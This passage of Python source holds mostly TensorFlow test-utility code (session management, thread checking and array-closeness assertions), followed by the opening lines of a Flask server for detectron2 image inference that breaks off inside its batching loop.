result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b, msg)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements")
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
server.py
|
from flask import Flask, jsonify, request, send_file
from detectron2.config import get_cfg
from detectron2.data.detection_utils import read_image
from predictor import VisualizationDemo
import numpy as np
import cv2
import io
import requests
from queue import Empty, Queue
import threading
import time
import json
import subprocess
from apply_net import main as apply_net_main
requests_queue = Queue()
app = Flask(__name__)
BATCH_SIZE=1
CHECK_INTERVAL=0.1
def is_json(myjson):
try:
json_object = json.loads(myjson)
except TypeError as e:
return False
return True
def handle_requests_by_batch():
while True:
requests_batch = []
while not (
len(requests_batch) >= BATCH_SIZE # or
#(len(requests_batch) > 0 #and time.time() - requests_batch[0]['time'] > BATCH_TIMEOUT)
):
try:
